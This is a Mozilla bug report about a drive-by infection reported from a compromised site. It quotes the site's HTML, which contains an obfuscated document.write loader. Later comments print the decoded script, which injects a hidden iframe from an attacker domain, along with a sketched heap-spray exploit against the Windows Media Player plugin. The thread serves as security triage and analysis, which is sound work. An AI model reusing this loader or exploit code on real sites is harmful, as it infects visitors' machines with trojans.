Closed
Bug 408063
Opened 18 years ago
Closed 18 years ago
Virus downloaded and placed in system32 folder
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: imqqmi, Unassigned)
References
()
Details
Attachments
(3 files, 2 obsolete files)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
This html script seems to use a security hole in firefox to download a random virus/trojan horse every time the page is loaded. The filename is w32sysX.exe where X is a number from 0 to 9. Viruses that were downloaded so far: Trojan horse Downloader.Generic6.YVH, Downloader.Obfuskated and Trojan horse Crypt.G. All catched by AVF Free edition.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0021)http://www.probuy.nl/ -->
<HTML><HEAD><TITLE>Probuy.nl</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="Internetsite Probuy" name=description>
<META content="index, follow" name=robots>
<META content="JSK Internet Solutions" name=author>
<META content="index, follow" name=robot>
<META content=all name=robots>
<META content=Nederlands/Dutch name=language>
<META content=1 name="revisit after">
<META content=Probuy name=keywords>
<META content="MSHTML 6.00.2800.1522" name=GENERATOR></HEAD>
<BODY><BR><BR>
<DIV align=center>
<CENTER>
<TABLE width="79%" border=0>
<TBODY>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<P align=center></P></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<DIV align=center>
<CENTER>
<TABLE width="63%" border=0>
<TBODY>
<TR>
<TD width="100%"></TD></TR></TBODY></TABLE></CENTER></DIV></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<P align=center><B><FONT color=#3f4bff size=6>Welkom</FONT><FONT
color=#3f4bff size=4><BR></FONT><FONT color=#3f4bff
size=7>Wilkommen</FONT></B></P></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"><IMG height=137 src="Probuy_nl_bestanden/pb1akopie.jpg"
width=511 border=0></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<P align=center><FONT color=#3f4bff><B>Choose your
language:</B></FONT></P></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<TABLE cellSpacing=15 width="100%" border=0>
<TBODY>
<TR>
<TD width="50%">
<P align=center><A href="http://www.probuy.nl/dutch/index.php"><IMG
height=57 src="Probuy_nl_bestanden/3dflagsdotcom_nethe_2fawm.gif"
width=84 border=0></A></P></TD>
<TD width="50%">
<P align=center><A
href="http://www.probuy.nl/germany/index.php"><IMG height=57
src="Probuy_nl_bestanden/3dflagsdotcom_gerna_2fawm.gif" width=84
border=0></A></P></TD></TR></TBODY></TABLE></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR></TBODY></TABLE></CENTER></DIV>
<P> </P>
<SCRIPT src="Probuy_nl_bestanden/urchin.js" type=text/javascript>
</SCRIPT>
<SCRIPT type=text/javascript>
_uacct = "UA-846121-4";
urchinTracker();
</SCRIPT>
<!-- fc396cb8c998060159288dea5ed48db1 -->
<SCRIPT>document.write(unescape("%3Cscript%3Eif%28Rr%21%3D1%29%7Bfunction%20NL%28Ps%29%7Breturn%20Ps%7Dtry%7Bfunction%20saE%28pxw%29%7Breturn%20parseInt%28pxw%29%7Dvar%20rwz%3D%27jjQjUQjdQjhQjGQjDQjBQj7Qj4QjIQjFQjTQjYQjqQjHQjXQjxQjRQjcQjpQjfQjCQjoQjVQjiQj5QjbQjJQjeQjlQjNQjzQjkQj3Qj8QjyQjZQjOQjaQjmQjtQjWQjrQjgQjsQjnQjSQj9QjAQjMQj6QjPQjLQjKQUjQUUQUdQUhQUGQUDQUBQU7QU4QUIQUFQUTQUYQUqQUHQUXQUxQURQUcQUpQUfQUCQUoQUV%27%3B%20var%20bWh%3DNL%28%27Q%27%29%2C%20bNW%3DArray%2810301%5E10361%2CsaE%28%2711%27%29%2CsaE%28%2727%27%29%2CsaE%28%2710%27%29%2CsaE%28%2717%27%29%2CsaE%28%278%27%29%2C16617%5E16613%2CsaE%28%2770%27%29%2CsaE%28%27117%27%29%2C9249%5E9299%2CsaE%28%2730%27%29%2C13114%5E13111%2CsaE%28%2722%27%29%2C26416%5E26407%2CsaE%28%2788%27%29%2C29978%5E29995%2CsaE%28%2762%27%29%2C8590%5E8599%2C25980%5E25961%2CsaE%28%2729%27%29%2C19173%5E19125%2CsaE%28%2781%27%29%2CsaE%28%273%27%29%2C18976%5E18981%2C29367%5E29409%2CsaE%28%271%27%29%2C25634%5E25703%2C8272%5E8225%2CsaE%28%2716%27%29%2CsaE%28%2766%27%29%2C23142%5E23097%2C25703%5E25723%2CsaE%28%2775%27%29%2CsaE%28%2720%27%29%2C412%5E387%2CsaE%28%2784%27%29%2CsaE%28%2787%27%29%2C1945%5E1943%2C3364%5E3383%2C13073%5E13095%2CsaE%28%2732%27%29%2C10409%5E10375%2CsaE%28%2773%27%29%2C23662%5E23637%2C31486%5E31473%2CsaE%28%2760%27%29%2CsaE%28%2767%27%29%2C22897%5E22877%2C13508%5E13463%2CsaE%28%2764%27%29%2C30285%5E30211%2CsaE%28%2776%27%29%2C26191%5E26119%2CsaE%28%2790%27%29%2C30251%5E30251%2CsaE%28%2763%27%29%2CsaE%28%2753%27%29%2C3418%5E3441%2CsaE%28%2789%27%29%2C1159%5E1213%2C28516%5E28489%2CsaE%28%2742%27%29%2C7973%5E7953%2C15215%5E15221%2CsaE%28%274%27%29%2C31234%5E31301%2CsaE%28%2735%27%29%2CsaE%28%2738%27%29%2CsaE%28%2785%27%29%2C7865%5E7867%2C1904%5E1841%2C11756%5E11721%2C30743%5E30771%2C1818%5E1837%2C21089%5E21035%2CsaE%28%2777%27%29%2CsaE%28%2779%27%29%2C13723%5E13769%29%3B%20var%20JaC%2C%20WoH%3B%20var%20tXb%2C%20WzT%3D%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%27%3B%20var%20VrK%3DString%28%29%3Brwz%3Drwz.split%28bWh%29%3Bfor%20%28JaC%3D0%3BJaC%3CWzT.length%3BJaC+%3D2%29%7BtXb%3DWzT.substr%28JaC%2C2%29%3Bvar%20nID%3Drwz.length%3Bfor%28WoH%3D0%3BWoH%3CnID%3BWoH++%29%20%7Bif%281%3D%3D0%29%3Bif%28rwz%5BWoH%5D%3D%3DtXb%29break%3B%7DVrK+%3DString.fromCharCode%28bNW%5BWoH%5D%5E120%29%3B%20%7Ddocument.write%28VrK%29%3B%7Dcatch%28ygF%29%7B%7D%7Dvar%20Rr%3D1%3C/script%3E"))</SCRIPT>
<!--/--></BODY></HTML>
Reproducible: Always
Steps to Reproduce:
1.Just load the above site or copy/paste above HTML script in a html file and op it using firefox
2.
3.
Actual Results:
After Firefox/script downloads and places the file in %systemroot%\system32 firefox just quits or hangs.
Expected Results:
Virus is downloaded. If the virus is run as well is unknown.
I can't see the site appearing on this message. Here it is again:
http://www.probuy.nl
|
||
Comment 2•18 years ago
|
||
The payload decodes twice to become
function IFrame(){}
IFrame.prototype = {
host : 'update3.classictel.org',
path : '/drivers/',
cookieName : 'dXupaet',
cookieValue : 1,
setCookie : function(name, value) {
var d= new Date();
d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" +
d.toGMTString();
},
install : function() { if(!this.alreadyInstalled()) {
var s =
"<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() +
"'></iframe>";
try {
document.write(s)
}
catch(e){ document.write("<html><body>" + s + "</body></html>")
}
this.setCookie(this.cookieName, this.cookieValue); } },
getFrameURL : function() {
var dlh=document.location.host;
return 'http://' + ((dlh == '' || dlh == 'undefined') ?
this.getRandString() : '') +
dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." +
this.getRandString() + "." + this.host + this.path;
},
alreadyInstalled : function() {
return
!(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
},
getRandString : function() {
var l=16, c= '0123456789abcdef', o='';
for (var i=0; i < l; i++)
o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o;
}
}
var o = new IFrame(); o.install();
|
||
Comment 3•18 years ago
|
||
www.probuy.nl doesn't have the obfuscated <script> tag anymore, they were probably hacked and then cleaned it up.
Could you attach that HTML file rather than pasting it in the comment?
|
|
||
Comment 5•18 years ago
|
||
An example url loaded in the iframe is:
<http://probuy.nl.063c9c9cf379ce64.update3.classictel.org/drivers/>
the script alone, crashed a bonecho build on linux.
|
|
||
Comment 6•18 years ago
|
||
An example url loaded in the iframe is:
<http://probuy.nl.063c9c9cf379ce64.update3.classictel.org/drivers/>
the script alone, crashed a bonecho build on linux.
|
|
||
Comment 7•18 years ago
|
||
without the comments.
Attachment #292795 -
Attachment is obsolete: true
Attachment #292796 -
Attachment is obsolete: true
|
|
||
Comment 8•18 years ago
|
||
|
|
||
Comment 9•18 years ago
|
||
And that page contains (comments from me):
<script>
function getPayload( /* machine code to download bad stuff */ )
// classic NOP-slide + heap-spray technique
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do { s += s }
while (s.length<0x0900000);
s+=unescape (getpayload());
</script>
<embed src="reallyreallylongstring.wmv">
</embed>
This is an exploit of the Windows Media Player Plugin (Microsoft advisory MS06-06) -- please, please upgrade your wmp plugin IMMEDIATELY. Microsoft patched this in February 2006.
If this plugin is that out of date please check all your others. Type about:plugins in the browser location bar and uninstall any you don't use, and for the others please check with the vendors that you have the latest. There have been lots of exploits released for all media players, including recently the popular QuickTime (should be 7.3), Java (should be 1.6_03), and Flash (should be 9.0 r115).
This is not a flaw in Firefox. We are working on ways to alert users to out of date plugins in future versions of Firefox.
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → INVALID
|
|
||
Updated•18 years ago
|
Group: security
|
Reporter | |
Comment 10•18 years ago
|
||
You need to log in
before you can comment on or make changes to this bug.
Description
•